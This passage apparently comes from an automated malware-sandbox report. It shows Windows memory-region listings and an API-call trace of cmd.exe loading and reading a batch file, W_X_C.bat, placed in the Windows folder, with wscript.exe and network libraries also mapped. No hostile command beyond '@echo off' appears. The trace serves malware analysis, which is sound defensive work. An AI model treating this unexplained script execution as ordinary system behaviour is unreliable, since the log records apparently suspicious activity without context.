"c:\\windows\\syswow64\\imm32.dll") Region: id = 1303 start_va = 0x76920000 end_va = 0x7697ffff monitored = 0 entry_point = 0x7693158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1304 start_va = 0x76e70000 end_va = 0x76f3bfff monitored = 0 entry_point = 0x76e7168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1305 start_va = 0x8a0000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1306 start_va = 0xa30000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 1307 start_va = 0x70000 end_va = 0x8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cmd.exe.mui") Region: id = 1308 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1309 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1314 start_va = 0x1a0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1324 start_va = 0x75cc0000 end_va = 0x76909fff monitored = 0 entry_point = 0x75d41601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1325 start_va = 0x75c60000 end_va = 0x75cb6fff monitored = 0 entry_point = 0x75c79ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1354 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1355 start_va = 0x74680000 end_va = 0x7481dfff monitored = 0 entry_point = 0x746ae6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1356 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1357 start_va = 0x280000 end_va = 0x281fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 1358 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1359 start_va = 0x1e30000 end_va = 0x20fefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1375 start_va = 0x2f0000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1376 start_va = 0x21e0000 end_va = 0x22dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 1377 start_va = 0x76c60000 end_va = 0x76dbbfff monitored = 0 entry_point = 0x76caba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1378 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 1379 start_va = 0x744d0000 end_va = 0x7454ffff monitored = 0 entry_point = 0x744e37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1380 start_va = 0x22e0000 end_va = 0x248ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 1389 start_va = 0x450000 end_va = 0x52efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1390 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1391 start_va = 0x738c0000 end_va = 0x739b4fff monitored = 0 entry_point = 0x738d0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1392 start_va = 0x775d0000 end_va = 0x7765efff monitored = 0 entry_point = 0x775d3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1393 start_va = 0x290000 end_va = 0x290fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1394 start_va = 0x77450000 end_va = 0x774d2fff monitored = 0 entry_point = 0x774523d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1405 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1420 start_va = 0x74640000 end_va = 0x74660fff monitored = 0 entry_point = 0x7464145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1421 start_va = 0x77400000 end_va = 0x77444fff monitored = 0 entry_point = 0x774011e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 1422 start_va = 0x2b0000 end_va = 0x2b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1423 start_va = 0x2c0000 end_va = 0x2e7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db") Region: id = 1424 start_va = 0x330000 end_va = 0x330fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1425 start_va = 0x22e0000 end_va = 0x23e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 1426 start_va = 0x2450000 end_va = 0x248ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 1427 start_va = 0x22e0000 end_va = 0x23e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 1428 start_va = 0x22e0000 end_va = 0x23e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 1429 start_va = 0x74670000 end_va = 0x7467afff monitored = 0 entry_point = 0x74671992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1430 start_va = 0x2b0000 end_va = 0x2b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1431 start_va = 0x340000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db") Region: id = 1432 start_va = 0x370000 end_va = 0x373fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1433 start_va = 0x530000 end_va = 0x595fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1434 start_va = 0x380000 end_va = 0x38dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 1436 start_va = 0x76fe0000 end_va = 0x77115fff monitored = 0 entry_point = 0x76fe1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1437 start_va = 0x772f0000 end_va = 0x773e4fff monitored = 0 entry_point = 0x772f1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1438 start_va = 0x75610000 end_va = 0x7580afff monitored = 0 entry_point = 0x756122d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1439 start_va = 0x75830000 end_va = 0x75950fff monitored = 0 entry_point = 0x7583158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1440 start_va = 0x773f0000 end_va = 0x773fbfff monitored = 0 entry_point = 0x773f238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1441 start_va = 0x22e0000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 1442 start_va = 0x390000 end_va = 0x390fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 1443 start_va = 0x2400000 end_va = 0x243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 1444 start_va = 0x2590000 end_va = 0x268ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 1445 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 1446 start_va = 0x5b0000 end_va = 0x5bffff monitored = 0 entry_point = 0x5b2f3b region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe") Region: id = 1447 start_va = 0x3a0000 end_va = 0x3c5fff monitored = 0 entry_point = 0x3a2f3b region_type = mapped_file name = "wscript.exe" filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe") Region: id = 1448 start_va = 0x5a0000 end_va = 0x5a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscript.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\wscript.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wscript.exe.mui") Region: id = 1449 start_va = 0x2550000 end_va = 0x258ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 1450 start_va = 0x2850000 end_va = 0x294ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 1451 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Thread: id = 57 os_tid = 0xfe4 [0134.507] GetProcAddress (hModule=0x75a80000, lpProcName="SetConsoleInputExeNameW") returned 0x75aaa775 [0134.510] GetProcessHeap () returned 0x610000 [0134.510] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400a) returned 0x626ad0 [0134.510] GetProcessHeap () returned 0x610000 [0134.510] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x626ad0 | out: hHeap=0x610000) returned 1 [0134.513] _wcsicmp (_String1="c:\\windows\\W_X_C.bat", _String2=")") returned 58 [0134.514] _wcsicmp (_String1="FOR", _String2="c:\\windows\\W_X_C.bat") returned 3 [0134.514] _wcsicmp (_String1="FOR/?", _String2="c:\\windows\\W_X_C.bat") returned 3 [0134.514] _wcsicmp (_String1="IF", _String2="c:\\windows\\W_X_C.bat") returned 6 [0134.514] _wcsicmp (_String1="IF/?", _String2="c:\\windows\\W_X_C.bat") returned 6 [0134.514] _wcsicmp (_String1="REM", _String2="c:\\windows\\W_X_C.bat") returned 15 [0134.514] _wcsicmp (_String1="REM/?", _String2="c:\\windows\\W_X_C.bat") returned 15 [0134.514] GetProcessHeap () returned 0x610000 [0134.514] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x610a40 [0134.514] GetProcessHeap () returned 0x610000 [0134.514] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x32) returned 0x610aa0 [0134.515] GetConsoleTitleW (in: lpConsoleTitle=0x18f740, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.515] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0134.516] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0134.516] GetVolumeInformationW (in: lpRootPathName="c:\\", lpVolumeNameBuffer=0x18f4fc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f4f4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f4f4*=0x8443a5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0134.516] GetProcessHeap () returned 0x610000 [0134.516] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x210) returned 0x610ae0 [0134.516] GetProcessHeap () returned 0x610000 [0134.516] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x32) returned 0x610cf8 [0134.516] _wcsnicmp (_String1="c:\\w", _String2="cmd ", _MaxCount=0x4) returned -51 [0134.517] GetProcessHeap () returned 0x610000 [0134.517] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x418) returned 0x610d38 [0134.517] SetErrorMode (uMode=0x0) returned 0x8001 [0134.517] SetErrorMode (uMode=0x1) returned 0x0 [0134.517] GetFullPathNameW (in: lpFileName="c:\\windows\\.", nBufferLength=0x208, lpBuffer=0x610d40, lpFilePart=0x18f260 | out: lpBuffer="c:\\windows", lpFilePart=0x18f260*="windows") returned 0xa [0134.517] SetErrorMode (uMode=0x8001) returned 0x1 [0134.517] GetProcessHeap () returned 0x610000 [0134.517] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x610d38, Size=0x32) returned 0x610d38 [0134.517] GetProcessHeap () returned 0x610000 [0134.517] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x610d38) returned 0x32 [0134.517] NeedCurrentDirectoryForExePathW (ExeName="c:\\windows\\.") returned 1 [0134.517] GetProcessHeap () returned 0x610000 [0134.517] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x24) returned 0x610d78 [0134.518] GetProcessHeap () returned 0x610000 [0134.518] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3c) returned 0x610da8 [0134.518] GetProcessHeap () returned 0x610000 [0134.518] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x610da8, Size=0x24) returned 0x610da8 [0134.518] GetProcessHeap () returned 0x610000 [0134.518] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x610da8) returned 0x24 [0134.518] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1d0640, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0134.518] GetProcessHeap () returned 0x610000 [0134.518] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe0) returned 0x610dd8 [0134.714] GetProcessHeap () returned 0x610000 [0134.714] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x610dd8, Size=0x76) returned 0x610dd8 [0134.714] GetProcessHeap () returned 0x610000 [0134.715] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x610dd8) returned 0x76 [0134.930] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0134.930] FindFirstFileExW (in: lpFileName="c:\\windows\\W_X_C.bat" (normalized: "c:\\windows\\w_x_c.bat"), fInfoLevelId=0x1, lpFindFileData=0x18effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18effc) returned 0x610e58 [0134.931] GetProcessHeap () returned 0x610000 [0134.931] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x6219e0 [0134.931] FindClose (in: hFindFile=0x610e58 | out: hFindFile=0x610e58) returned 1 [0134.931] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0134.931] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0134.931] GetConsoleTitleW (in: lpConsoleTitle=0x18f4d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.932] GetProcessHeap () returned 0x610000 [0134.932] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x11c) returned 0x610e58 [0134.932] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x76f40000 [0134.932] GetProcAddress (hModule=0x76f40000, lpProcName="SaferIdentifyLevel") returned 0x76f62102 [0134.932] IdentifyCodeAuthzLevelW () returned 0x1 [0134.944] GetProcAddress (hModule=0x76f40000, lpProcName="SaferComputeTokenFromLevel") returned 0x76f63352 [0134.944] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1 [0134.945] GetProcAddress (hModule=0x76f40000, lpProcName="SaferCloseLevel") returned 0x76f63825 [0134.945] CloseCodeAuthzLevel () returned 0x1 [0134.945] SetErrorMode (uMode=0x0) returned 0x8001 [0134.945] SetErrorMode (uMode=0x1) returned 0x0 [0134.945] GetFullPathNameW (in: lpFileName="c:\\windows\\W_X_C.bat", nBufferLength=0x104, lpBuffer=0x610ae8, lpFilePart=0x18f3c0 | out: lpBuffer="c:\\windows\\W_X_C.bat", lpFilePart=0x18f3c0*="W_X_C.bat") returned 0x14 [0134.945] SetErrorMode (uMode=0x8001) returned 0x1 [0134.945] GetProcessHeap () returned 0x610000 [0134.945] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x32) returned 0x61f7a0 [0134.946] CmdBatNotification () returned 0x610b0e [0134.946] CreateFileW (lpFileName="c:\\windows\\W_X_C.bat" (normalized: "c:\\windows\\w_x_c.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18f404, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0134.946] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0134.946] _get_osfhandle (_FileHandle=3) returned 0x80 [0134.946] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.947] _get_osfhandle (_FileHandle=3) returned 0x80 [0134.947] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.947] ReadFile (in: hFile=0x80, lpBuffer=0x4a1c6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x18f3e8, lpOverlapped=0x0 | out: lpBuffer=0x4a1c6640*, lpNumberOfBytesRead=0x18f3e8*=0x150, lpOverlapped=0x0) returned 1 [0134.949] SetFilePointer (in: hFile=0x80, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0134.949] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="@echo off\r\n", cbMultiByte=11, lpWideCharStr=0x4a1cc640, cchWideChar=8191 | out: lpWideCharStr="@echo off\r\n") returned 11 [0134.950] _get_osfhandle (_FileHandle=3) returned 0x80 [0134.950] GetFileType (hFile=0x80) returned 0x1 [0134.950] _get_osfhandle (_FileHandle=3) returned 0x80 [0134.950] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0134.950] GetProcessHeap () returned 0x610000 [0134.950] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400a) returned 0x626ad0 [0134.950] GetProcessHeap () returned 0x610000 [0134.951] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x626ad0 | out: hHeap=0x610000) returned 1 [0134.951] GetProcessHeap () returned 0x610000 [0134.951] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x624f68 [0134.952] _wcsicmp (_String1="echo", _String2=")") returned 60 [0134.952] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0134.952] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0134.952] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0134.952] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0134.952] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0134.952] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0134.952] GetProcessHeap () returned 0x610000 [0134.952] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x624fc8 [0134.952] GetProcessHeap () returned 0x610000 [0134.953] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12) returned 0x611350 [0134.953] GetProcessHeap () returned 0x610000 [0134.953] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x12) returned 0x625028 [0135.034] _tell (_FileHandle=3) returned 11 [0135.083] _close (_FileHandle=3) returned 0 [0135.084] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0135.084] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0135.084] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0135.084] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0135.084] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0135.084] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0135.084] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0135.084] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0135.084] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0135.084] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0135.084] GetConsoleTitleW (in: lpConsoleTitle=0x18efcc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0135.085] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0135.085] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0135.085] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0135.085] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0135.085] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0135.085] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0135.085] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0135.085] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0135.085] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0135.085] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0135.085] GetProcessHeap () returned 0x610000 [0135.086] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1c) returned 0x6247a8 [0135.086] GetProcessHeap () returned 0x610000 [0135.086] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6247a8, Size=0x12) returned 0x625048 [0135.087] GetProcessHeap () returned 0x610000 [0135.087] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x625048) returned 0x12 [0135.087] GetProcessHeap () returned 0x610000 [0135.087] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1c) returned 0x6247a8 [0135.087] _wcsnicmp (_String1="off", _String2="off", _MaxCount=0x3) returned 0 [0135.087] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.087] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0135.088] _get_osfhandle (_FileHandle=1) returned 0x7 [0135.088] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1c41ac | out: lpMode=0x4a1c41ac) returned 1 [0135.089] _get_osfhandle (_FileHandle=0) returned 0x3 [0135.089] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1c41b0 | out: lpMode=0x4a1c41b0) returned 1 [0135.089] SetConsoleInputExeNameW () returned 0x1 [0135.089] GetConsoleOutputCP () returned 0x1b5 [0135.090] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1c4260 | out: lpCPInfo=0x4a1c4260) returned 1 [0135.090] SetThreadUILanguage (LangId=0x0) returned 0x409 [0135.090] CreateFileW (lpFileName="c:\\windows\\W_X_C.bat" (normalized: "c:\\windows\\w_x_c.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18f404, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80 [0135.090] _open_osfhandle (_OSFileHandle=0x80, _Flags=8) returned 3 [0135.090] _get_osfhandle (_FileHandle=3) returned 0x80 [0135.090] SetFilePointer (in: hFile=0x80, lDistanceToMove=11, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0135.090] GetProcessHeap () returned 0x610000 [0135.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6247a8 | out: hHeap=0x610000) returned 1 [0135.091] GetProcessHeap () returned 0x610000 [0135.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x625048 | out: hHeap=0x610000) returned 1 [0135.091] GetProcessHeap () returned 0x610000 [0135.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x625028 | out: hHeap=0x610000) returned 1 [0135.091] GetProcessHeap () returned 0x610000 [0135.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x611350 | out: hHeap=0x610000) returned 1 [0135.091] GetProcessHeap () returned 0x610000 [0135.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624fc8 | out: hHeap=0x610000) returned 1 [0135.091] GetProcessHeap () returned 0x610000 [0135.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624f68 | out: hHeap=0x610000) returned 1 [0135.091] _get_osfhandle (_FileHandle=3) returned 0x80 [0135.091] SetFilePointer (in: hFile=0x80, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb [0135.092] ReadFile (in: hFile=0x80, lpBuffer=0x4a1c6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x18f3e8, lpOverlapped=0x0 | out: lpBuffer=0x4a1c6640*, lpNumberOfBytesRead=0x18f3e8*=0x145, lpOverlapped=0x0) returned 1 [0135.092] SetFilePointer (in: hFile=0x80, lDistanceToMove=58, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3a [0135.092] 